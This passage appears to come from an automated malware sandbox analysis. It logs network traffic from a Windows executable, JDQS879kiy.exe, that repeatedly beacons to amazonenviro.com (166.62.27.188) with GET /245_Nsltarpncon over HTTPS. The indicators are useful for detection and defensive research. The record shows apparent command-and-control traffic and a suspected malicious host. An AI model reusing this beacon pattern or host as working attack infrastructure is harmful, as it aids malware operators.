                      Jan 14, 2025 08:26:07.648478985 CET50108443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:07.651133060 CET50108443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:07.651170015 CET44350108166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:07.651218891 CET50108443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:07.658413887 CET50109443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:07.658442020 CET44350109166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:07.658529043 CET50109443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:07.674534082 CET50109443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:07.674561024 CET44350109166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:08.575304985 CET44350109166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:08.575370073 CET50109443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:08.576673031 CET50109443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:08.576692104 CET44350109166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:08.576968908 CET44350109166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:08.578120947 CET50109443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:08.623328924 CET44350109166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:09.155627012 CET44350109166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:09.155924082 CET44350109166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:09.155987024 CET50109443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:09.156239033 CET50109443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:09.156254053 CET44350109166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:09.156265974 CET50109443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:09.156271935 CET44350109166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:09.270395041 CET50110443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:09.270445108 CET44350110166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:09.270523071 CET50110443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:09.270637989 CET50110443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:09.270678997 CET44350110166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:09.270728111 CET50110443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:09.377948046 CET50111443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:09.377983093 CET44350111166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:09.378057003 CET50111443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:09.378475904 CET50111443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:09.378487110 CET44350111166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:10.298998117 CET44350111166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:10.299113989 CET50111443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:10.481662989 CET50111443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:10.481726885 CET44350111166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:10.482356071 CET44350111166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:10.483659029 CET50111443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:10.527332067 CET44350111166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:10.890696049 CET44350111166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:10.890980959 CET44350111166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:10.891046047 CET50111443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:10.892765045 CET50111443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:10.892787933 CET44350111166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:10.892805099 CET50111443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:10.892812967 CET44350111166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:11.006637096 CET50112443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:11.006669998 CET44350112166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:11.006766081 CET50112443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:11.006894112 CET50112443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:11.006937027 CET44350112166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:11.006984949 CET50112443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:11.008871078 CET50113443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:11.008964062 CET44350113166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:11.009099007 CET50113443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:11.009423971 CET50113443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:11.009463072 CET44350113166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:11.895807028 CET44350113166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:11.895894051 CET50113443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:11.897092104 CET50113443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:11.897116899 CET44350113166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:11.897372961 CET44350113166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:11.898530006 CET50113443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:11.939332962 CET44350113166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:12.473481894 CET44350113166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:12.473622084 CET44350113166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:12.473679066 CET50113443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:12.473723888 CET50113443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:12.473768950 CET44350113166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:12.473800898 CET50113443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:12.473817110 CET44350113166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:12.586971045 CET50114443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:12.587023020 CET44350114166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:12.587126970 CET50114443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:12.587328911 CET50114443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:12.587361097 CET44350114166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:12.587414026 CET50114443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:12.589694023 CET50115443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:12.589782953 CET44350115166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:12.589855909 CET50115443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:12.590190887 CET50115443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:12.590228081 CET44350115166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:13.493315935 CET44350115166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:13.493603945 CET50115443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:13.494839907 CET50115443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:13.494848967 CET44350115166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:13.495101929 CET44350115166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:13.496378899 CET50115443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:13.539330959 CET44350115166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:14.083494902 CET44350115166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:14.083849907 CET44350115166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:14.083920002 CET50115443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:14.083978891 CET50115443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:14.083978891 CET50115443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:14.084008932 CET44350115166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:14.084039927 CET44350115166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:14.196975946 CET50116443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:14.197036982 CET44350116166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:14.197150946 CET50116443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:14.197248936 CET50116443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:14.197376013 CET44350116166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:14.198388100 CET50116443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:14.199671030 CET50117443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:14.199727058 CET44350117166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:14.199789047 CET50117443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:14.200068951 CET50117443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:14.200083971 CET44350117166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:15.115240097 CET44350117166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:15.115309000 CET50117443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:15.117048025 CET50117443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:15.117055893 CET44350117166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:15.117307901 CET44350117166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:15.118529081 CET50117443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:15.159327030 CET44350117166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:15.701951981 CET44350117166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:15.702120066 CET44350117166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:15.702179909 CET50117443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:15.703423977 CET50117443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:15.703437090 CET44350117166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:15.703447104 CET50117443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:15.703453064 CET44350117166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:15.816391945 CET50118443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:15.816430092 CET44350118166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:15.816513062 CET50118443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:15.816637039 CET50118443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:15.816660881 CET44350118166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:15.816713095 CET50118443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:15.818581104 CET50119443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:15.818620920 CET44350119166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:15.818679094 CET50119443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:15.819005966 CET50119443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:15.819040060 CET44350119166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:16.712821007 CET44350119166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:16.712923050 CET50119443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:16.714174986 CET50119443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:16.714205980 CET44350119166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:16.714565992 CET44350119166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:16.715768099 CET50119443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:16.759349108 CET44350119166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:17.303258896 CET44350119166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:17.303376913 CET44350119166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:17.303438902 CET50119443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:17.303504944 CET50119443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:17.303527117 CET44350119166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:17.303538084 CET50119443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:17.303544044 CET44350119166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:17.415591955 CET50120443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:17.415642023 CET44350120166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:17.415718079 CET50120443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:17.415798903 CET50120443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:17.416121006 CET44350120166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:17.416189909 CET50120443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:17.418040037 CET50121443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:17.418095112 CET44350121166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:17.418195009 CET50121443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:17.418457031 CET50121443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:17.418473959 CET44350121166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:18.325861931 CET44350121166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:18.325953960 CET50121443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:18.332365036 CET50121443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:18.332380056 CET44350121166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:18.332745075 CET44350121166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:18.333877087 CET50121443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:18.375341892 CET44350121166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:18.921344042 CET44350121166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:18.921601057 CET44350121166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:18.921674967 CET50121443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:18.921894073 CET50121443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:18.921905994 CET44350121166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:19.036088943 CET50122443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:19.036154032 CET44350122166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:19.036241055 CET50122443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:19.044892073 CET50122443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:19.044946909 CET44350122166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:19.045015097 CET50122443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:19.048132896 CET50123443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:19.048198938 CET44350123166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:19.048264980 CET50123443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:19.048715115 CET50123443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:19.048732996 CET44350123166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:19.976366043 CET44350123166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:19.976479053 CET50123443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:19.993393898 CET50123443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:19.993416071 CET44350123166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:19.993858099 CET44350123166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:19.997591972 CET50123443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:20.043332100 CET44350123166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:20.580615044 CET44350123166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:20.580862045 CET44350123166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:20.580959082 CET50123443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:20.581017971 CET50123443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:20.581037045 CET44350123166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:20.581053972 CET50123443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:20.581060886 CET44350123166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:20.694535971 CET50124443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:20.694612980 CET44350124166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:20.694700956 CET50124443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:20.694781065 CET50124443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:20.694827080 CET44350124166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:20.694878101 CET50124443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:20.696984053 CET50125443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:20.697038889 CET44350125166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:20.697129965 CET50125443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:20.697406054 CET50125443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:20.697418928 CET44350125166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:21.590600967 CET44350125166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:21.590785980 CET50125443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:21.592463017 CET50125443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:21.592477083 CET44350125166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:21.592729092 CET44350125166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:21.594616890 CET50125443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:21.635333061 CET44350125166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:22.171801090 CET44350125166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:22.171889067 CET44350125166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:22.171946049 CET50125443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:22.172087908 CET50125443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:22.172107935 CET44350125166.62.27.188192.168.2.7
                      Jan 14, 2025 08:26:22.172121048 CET50125443192.168.2.7166.62.27.188
                      Jan 14, 2025 08:26:22.172126055 CET44350125166.62.27.188192.168.2.7

                      UDP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Jan 14, 2025 08:24:11.261616945 CET5719653192.168.2.71.1.1.1
                      Jan 14, 2025 08:24:17.619865894 CET5615153192.168.2.71.1.1.1
                      Jan 14, 2025 08:24:17.631828070 CET53561511.1.1.1192.168.2.7

                      DNS Queries

                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                      Jan 14, 2025 08:24:11.261616945 CET192.168.2.71.1.1.10x548aStandard query (0)time.windows.comA (IP address)IN (0x0001)false
                      Jan 14, 2025 08:24:17.619865894 CET192.168.2.71.1.1.10x92acStandard query (0)amazonenviro.comA (IP address)IN (0x0001)false

                      DNS Answers

                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                      Jan 14, 2025 08:24:11.268670082 CET1.1.1.1192.168.2.70x548aNo error (0)time.windows.comtwc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                      Jan 14, 2025 08:24:12.175918102 CET1.1.1.1192.168.2.70xa36aNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.netazurefd-t-fb-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                      Jan 14, 2025 08:24:12.175918102 CET1.1.1.1192.168.2.70xa36aNo error (0)dual.s-part-0017.t-0009.fb-t-msedge.nets-part-0017.t-0009.fb-t-msedge.netCNAME (Canonical name)IN (0x0001)false
                      Jan 14, 2025 08:24:12.175918102 CET1.1.1.1192.168.2.70xa36aNo error (0)s-part-0017.t-0009.fb-t-msedge.net13.107.253.45A (IP address)IN (0x0001)false
                      Jan 14, 2025 08:24:17.631828070 CET1.1.1.1192.168.2.70x92acNo error (0)amazonenviro.com166.62.27.188A (IP address)IN (0x0001)false

                      HTTP Request Dependency Graph

                      • amazonenviro.com

                      HTTPS Proxied Packets

                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.749736166.62.27.1884437852C:\Users\user\Desktop\JDQS879kiy.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 07:24:19 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:24:19 UTC225INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:24:19 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      1192.168.2.749753166.62.27.1884437852C:\Users\user\Desktop\JDQS879kiy.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 07:24:20 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:24:21 UTC225INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:24:20 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      2192.168.2.749765166.62.27.1884437852C:\Users\user\Desktop\JDQS879kiy.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 07:24:22 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:24:22 UTC225INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:24:22 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      3192.168.2.749777166.62.27.1884437852C:\Users\user\Desktop\JDQS879kiy.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 07:24:23 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:24:24 UTC225INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:24:24 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      4192.168.2.749789166.62.27.1884437852C:\Users\user\Desktop\JDQS879kiy.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 07:24:25 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:24:26 UTC225INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:24:25 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      5192.168.2.749801166.62.27.1884437852C:\Users\user\Desktop\JDQS879kiy.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 07:24:27 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:24:27 UTC225INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:24:27 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      6192.168.2.749813166.62.27.1884437852C:\Users\user\Desktop\JDQS879kiy.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 07:24:28 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:24:29 UTC225INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:24:29 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      7192.168.2.749825166.62.27.1884437852C:\Users\user\Desktop\JDQS879kiy.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 07:24:30 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:24:31 UTC225INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:24:30 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      8192.168.2.749840166.62.27.1884437852C:\Users\user\Desktop\JDQS879kiy.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 07:24:32 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:24:32 UTC225INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:24:32 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      9192.168.2.749853166.62.27.1884437852C:\Users\user\Desktop\JDQS879kiy.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 07:24:33 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:24:34 UTC225INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:24:34 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      10192.168.2.749864166.62.27.1884437852C:\Users\user\Desktop\JDQS879kiy.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 07:24:35 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:24:35 UTC225INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:24:35 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      11192.168.2.749874166.62.27.1884437852C:\Users\user\Desktop\JDQS879kiy.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 07:24:36 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:24:37 UTC225INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:24:37 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      12192.168.2.749885166.62.27.1884437852C:\Users\user\Desktop\JDQS879kiy.exe
                      TimestampBytes transferredDirectionData
